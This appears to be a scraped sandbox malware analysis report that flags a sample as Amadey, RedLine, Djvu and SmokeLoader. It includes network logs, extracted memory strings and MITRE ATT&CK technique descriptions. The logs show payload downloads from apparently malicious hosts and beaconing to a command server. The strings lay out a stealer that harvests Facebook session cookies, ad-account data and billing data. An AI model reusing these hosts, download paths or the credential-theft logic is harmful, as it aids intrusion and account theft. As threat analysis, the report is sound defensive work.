Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
Source: global traffic	HTTP traffic detected: GET /calc2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: reinroot.top
Source: global traffic	HTTP traffic detected: GET /dl/build.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: colisumy.com
Source: global traffic	HTTP traffic detected: GET /dl/build2.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: colisumy.com
Source: global traffic	HTTP traffic detected: GET /156.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: h170013.srv22.test-hf.su
Source: global traffic	HTTP traffic detected: GET /412a0310f85f16ad/sqlite3.dll HTTP/1.1Host: adriaenclaeys.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /157.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: h170013.srv22.test-hf.su
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: TeslaBrowser/5.5Host: gstatic-node.io
Source: global traffic	HTTP traffic detected: GET /login HTTP/1.1Connection: Keep-AliveUser-Agent: TeslaBrowser/5.5Host: gstatic-node.ioCookie: PHPSESSID=vfpann92l3q6mpg926beu9gg04
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com
Source: global traffic	HTTP traffic detected: GET /check/safe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43Host: aa.imgjeoogbb.com

Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207
Source: unknown	TCP traffic detected without corresponding DNS query: 95.214.25.207

Source: aafg31.exe, 0000001A.00000002.877961247.0000000003100000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: InitOnceExecuteOnceCreateSemaphoreWCreateSemaphoreExWCreateThreadpoolTimerSetThreadpoolTimerWaitForThreadpoolTimerCallbacksCloseThreadpoolTimerCreateThreadpoolWaitSetThreadpoolWaitCloseThreadpoolWaitFlushProcessWriteBuffersFreeLibraryWhenCallbackReturnsGetCurrentProcessorNumberCreateSymbolicLinkWGetCurrentPackageIdSetFileInformationByHandleInitializeConditionVariableWakeConditionVariableInitializeSRWLockAcquireSRWLockExclusiveTryAcquireSRWLockExclusiveReleaseSRWLockExclusiveSleepConditionVariableSRWCreateThreadpoolWorkSubmitThreadpoolWorkCloseThreadpoolWorkUnknown exceptionbad array new lengthstring too longmap/set too longMUI1isinstall0macuidun_pwdc_userdblnMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43https://www.facebook.com/ed/login/ice-bas/login/dev"="st"azoe"jsd""luid"=urce""sot=oesjazlsd&d=&uirce=&souxt=&nehttps://www.facebook.com/login/device-based/login/ersc_uonkieJscoocookieJsonhttps://adsmanager.facebook.com/ads/manager/accounts<tbodyaccountIdpayInfo</tbody>></tr><tr?act</td> <tdlastRowdata-sortpaidbilling_statushttps://business.facebook.com/billing_hub/payment_settings/?asset_id="ACCOUNT_ID":"globalScopeID":token":""DTSGInitData""LSD",:"__spin_r""__spin_t"av=&__user=&__a=1&__csr=&__req=5&dpr=1&__ccg=EXCELLENT&__comet_req=0&fb_dtsg=&lsd=&__spin_r=&__spin_b=trunk&__spin_t=&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BillingAMNexusRootQuery&variables={"paymentAccountID":""}&server_timestamps=true&doc_id=4123775161071594https://business.facebook.com/api/graphql/?lll=pppdatabillable_account_by_payment_accountbilling_payment_accountbilling_payment_methodspayment_modesSUPPORTS_POSTPAYhttps://business.facebook.com/selectbusiness_id=businesshttps://www.facebook.com/pages/?category=your_pages&ref=bookmarks}"profile_switcher_eligible_profiles":{"count"hasHomePage"admined_pages":{"nodes":[{"id"aria-label="Verified"http://aa.imgjeoogbb.com/check/safe{"sid":0,"time":0,"rand_str":""}http://aa.imgjeoogbb.com/check/?sid=dsi#IO$J2&89DFJ2^984%7FJfj<>asi?h3.728*fhastimerand_str89%3gj,IH@<F7>84\|j5kl3;4y:jdFJOhf01(92)3&key=invalid vector subscriptinvalid string positionvector too long equals www.facebook.com (Facebook)
Source: aafg31.exe, 0000001A.00000002.877961247.0000000003100000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: iostreambad castbad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setinvalid stoi argumentstoi argument out of range^(([^:\/?#]+):)?(//([^\/?#:])(:([^\/?#]))?)?([^?#])(\?([^#]))?(#(.))?httphttps?POSTGET/device-based/loginContent-Type: application/x-www-form-urlencodedContent-Length: facebooksec-ch-ua: "Not.A/Brand";v="8", "Chromium";v="114", "Microsoft Edge";v="114"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Connection: keep-alive/selectHost: business.facebook.comsec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Mode: navigate: ?1Sec-Fetch-Userest: documentSec-Fetch-Dame-originch-Site: sSec-Fet/accountsHost: adsmanager.facebook.com/billing_hub/bile: ?0a-mosec-ch-urm: "Windows"latfosec-ch-ua-polor-scheme: lightefers-csec-ch-precure-Requests: 1de-InsUpgraetch-Site: noneSec-Fode: navigateetch-Mer: ?1c-Fetch-UsSementest: docutch-DSec-Feapi/graphql/?lll=pppX-FB-Friendly-Name: BillingHubPaymentSettingsPaymentMethodsListQueryOrigin: https://business.facebook.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: empty/v15.0/k.comcebooHost: graph.fadows": "Winsec-ch-ua-platform-urlencodedpplication/x-www-formContent-type: aept: /*Accok.comaceboOrigin: https://www.fame-sitetch-Site: stch-Mode: corsmptych-Dest: eook.com///www.facebReferer: https:ook.comw.facebHost: wwobile: ?0-ch-ua-msecindows"a-platform: "Ws-color-scheme: lightprefersec-ch-equests: 1ecure-RUpgrade-InsSec-Fetch-Site: noneMode: navigateSec-Fetch-ser: ?1Sec-Fetch-Uentst: documSec-Fetch-DeCache-Control: max-age=0vector<bool> too longalnumalnumalphaalphablankblankcntrlcntrlddigitdigitgraphgraphlowerlowerprintprintpunctpunctspacespacesupperupperwwxdigitxdigit equals www.facebook.com (Facebook)

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: Djvu

Threatname: RedLine

Threatname: SmokeLoader

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\f6f6d26e957fdb6a96caaf1481890445

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FE5F.exe.log

C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\imagc[1].jpg

C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe

Windows Analysis Report
file.exe

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre